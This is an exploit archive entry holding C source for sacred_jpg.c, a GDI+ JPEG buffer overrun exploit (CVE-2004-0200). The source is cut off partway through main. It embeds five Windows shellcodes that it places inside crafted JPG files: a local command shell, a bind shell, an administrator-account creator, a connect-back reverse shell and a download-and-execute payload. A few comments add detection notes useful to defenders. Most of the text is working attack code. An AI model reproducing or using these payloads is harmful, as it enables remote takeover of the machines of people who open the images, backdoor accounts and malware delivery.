
sacred_jpg.c

sacred_jpg.c
Posted Oct 7, 2004
Authored by Crypto

GDI+ buffer overrun exploit that builds a malicious .JPG file.

tags | exploit, overflow
advisories | CVE-2004-0200
SHA-256 | 2120feeb6515aaa49b2db0fdada31774f9ac67c30e70927ba0892e23f6f7acc3

//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// This is provided as proof-of-concept code only for educational
// purposes and testing by authorized individuals with permission to
// do so.
//
// .:[Sacred Desciples of Doom]:.
//
// GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>
// Greets to FoToZ who found the bug
// Exploit will build a malicious JPG File
//
// Note: The headers here are only sample headers taken from a .JPG file,
// with the FF FE 00 01 inserted in header1. We can use a 2500-byte
// space for shellcode.
//
//Greets to my friends: Wyk,SSarpele,sAD_sMile, Pimpa, Sacred, to my doggy Kiki :)
//and to other Hackers from Republica Moldova.
//
// Tested on an unpatched WinXP SP1 Eng
//
// PS: I was playing with this exploit for a couple of days ... when I wanted to post
// it, HighT1mes already made an exploit with the same functionality ...
// but with really not nice shellcodes, especially the shellcode for adding an
// administrator ... but http_shellcode was nice :)
// you stay on #romhack , I stay on #moldhack heheh :) nick:Alladin`
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <direct.h>
#include <windows.h>
#include <winbase.h>
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+221+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)



//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//pop up cmd.exe
char shellcode1[]=
"\x68" // push
"cmd "
"\x8B\xC4" // mov eax,esp
"\x50" // push eax
"\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1)
"\xFF\xD0"; // call eax


//bind cmd.exe on a [port] defined by user
unsigned char shellcode2[] =
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0";


//It will create a new user account with the username="ASP32.NET"
// and password of "ASP" and add it to the local group "Administrators"
char shellcode3[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x41\x53\x50"
"\x33\x32\x2e\x4e\x45\x54\x20\x41\x53\x50\x20\x2f\x41\x44\x44\x20"
"\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75"
"\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x41\x53\x50\x33\x32\x2e\x4e\x45\x54\x20\x2f\x41\x44\x44\x00";


//connect back to a user defined [ip] and [port]
unsigned char shellcode4[] =
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57"
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89"
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59"
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00"
"\x01\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59"
"\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac"
"\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66"
"\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c"
"\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51"
"\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89"
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff"
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31"
"\xdb\x53\xff\xd0";

//download from http
char shellcode5[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";



//add other shellcodes that you need here :)
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

// Sample JFIF header (SOI, APP0, APP12, APP14) followed by a COM segment
// (FF FE) whose two-byte length field is 00 01. A JPEG segment length
// includes the two length bytes themselves, so any value below 2 is
// malformed; this under-length COM segment is the CVE-2004-0200 trigger
// condition. Defensive takeaway: a parser must reject a segment length < 2
// before doing any "length - 2" arithmetic, and a content filter can flag
// JPEG files carrying a COM/APPn marker with a length field of 0 or 1.
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68"
;

/*
 * Print the tool banner on stdout.
 *
 * The banner lines contain no conversion specifiers, so they are written
 * with fputs() instead of being passed to printf() as format strings.
 */
void show()
{
    static const char *const banner[] = {
        "_____________________________________________________________________\n\n",
        " .:[Sacred Desciples of Doom]:. \n",
        " GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> \n",
        " Greets to FoToZ who found the bug \n",
        " These Exploit will build malicious JPG File \n\n",
        "_____________________________________________________________________\n\n",
    };
    size_t k;

    for (k = 0; k < sizeof banner / sizeof banner[0]; k++) {
        fputs(banner[k], stdout);
    }
}

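/*
 * Print the banner plus the usage text, then terminate the process.
 *
 * s: program name echoed in the usage examples (normally argv[0]). The
 *    array declarator decays to char *, and argv[0] may be NULL when the
 *    process is started with an empty argv, so a literal name is
 *    substituted rather than handing NULL to "%s" (undefined behaviour).
 * Does not return: ends with exit(1), so callers need no exit() of their own.
 */
void show_usage(char s[255])
{
    const char *prog = (s != NULL) ? s : "sacred_jpg";

    printf("_____________________________________________________________________\n\n");
    printf(" .:[Sacred Desciples of Doom]:. \n");
    printf(" GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> \n");
    printf(" Greets to FoToZ who found the bug \n");
    printf(" These Exploit will build malicious JPG File \n\n");
    printf("_____________________________________________________________________\n\n");
    printf(" Usage: \n");
    printf("\t%s 1: For lounching a local cmd.exe (not bound to the net)\n", prog);
    printf("\t%s 2 [port]: For lounching cmd.exe on defined [port]\n", prog);
    printf("\t%s 3: For creating a new user account\n", prog);
    printf("\twith the username=\"ASP32.NET\"\n");
    printf("\tand password=\"ASP\"and add it to the local group \"Administrators\"\n");
    printf("\t%s 4 [ip] [port]: For making a conection to a defined [ip]\n", prog);
    printf("\tand on defined [port] and bind cmd.exe on it\n");
    printf("\t%s 5 [http]: For downloading and then executing a file\n", prog);
    exit(1);
}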

// Entry point. argv[1] selects one of the five embedded payloads; the matching
// branch writes a JPEG under .\Crypto with the fixed layout
//   header1 + setNOPs1 + header2, 0x90 padding up to file offset 0x63c,
//   the payload, 0x90 padding, setNOPs2, then the EOI marker FF D9.
// Windows-only: relies on <direct.h> mkdir(), Winsock (htons/inet_addr) and
// the MSVC CRT extension fcloseall(). Returns 0 in every case, including when
// argv[1] matches no mode (no branch runs and no file is written).
//
// Detection note: every generated file carries the under-length COM marker
// (FF FE 00 01) from header1 and an image body padded to 0x1000 bytes (when
// the payload fits) that is mostly 0x90 bytes — both are usable as scanning
// signatures for this generator's output.
int main(int argc, char *argv[])
{

FILE *fout;
unsigned int i=0,j=0;
unsigned short port=31337; // default is never used: modes 2 and 4 overwrite it from argv
unsigned long ip;
WSADATA wsa;



// Only argv[1] is guarded; the per-mode argv[2]/argv[3] reads below have no
// argc check of their own. The printf is a leftover debug print: sizeof
// yields size_t, so "%d" is a mismatched format specifier, and the exit(1)
// after show_usage() is unreachable because show_usage() exits itself.
if (argc < 2) { printf("%d",sizeof(shellcode5));
show_usage(argv[0]);
exit(1);
}

//pop up cmd.exe
// atoi() returns 0 for non-numeric input, which matches none of the modes.
if (atoi(argv[1]) == 1)
{
show();
mkdir("Crypto"); // return value unchecked; failure or an existing directory both fall through to fopen()
fout=fopen("Crypto\\Crypto1.jpg","wb");

if( !fout ) {
printf("\t\tErorr:Opening File ...\n");
exit(1);
}



// Scan the payload for the byte pair FF D9 (0xD9FF read little-endian),
// i.e. a stray EOI marker. The cast is an unaligned 2-byte read through a
// char buffer (alignment / strict-aliasing hazard on stricter targets), and
// a hit only prints a warning — the file is still written.
for(i=0;i<sizeof(shellcode1)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode1[i] )
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode1)-1); // size_t printed with "%u"

// Byte count of the three header pieces; each sizeof includes a NUL
// terminator that is not written, hence the -3.
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);
// i now tracks the file offset; pad so that setNOPs2 ends at offset 0x1000.
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9"); // JPEG EOI marker

printf("\t\tOk, Malicious JPG File Created ...\n\n");

// MSVC CRT extension that closes every open stream, including fout. Its
// return value is not checked, so a failed flush goes unreported.
fcloseall();
}

//bind cmd.exe on a [port]
if ((atoi(argv[1]) == 2))
{
show();
mkdir("Crypto"); // return value unchecked
fout=fopen("Crypto\\Crypto2.jpg","wb");

if( !fout ) {
printf("\t\tErorr:Opening File ...\n");
exit(1);
}

// lets initialize the socket library, couse we use htons function
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

// argv[2] is read without an argc >= 3 check: "<prog> 2" with no port
// passes argv[2] == NULL to atoi(), which is undefined behaviour.
// The macro then stores the network-order port into shellcode2 at the
// offset hard-coded in SET_PORTBIND_PORT, via an unaligned 16-bit write.
port = atoi(argv[2]);
SET_PORTBIND_PORT(shellcode2, htons(port));

// Same FF D9 scan as mode 1 (warning only).
for(i=0;i<sizeof(shellcode2)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode2[i] )
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode2)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);
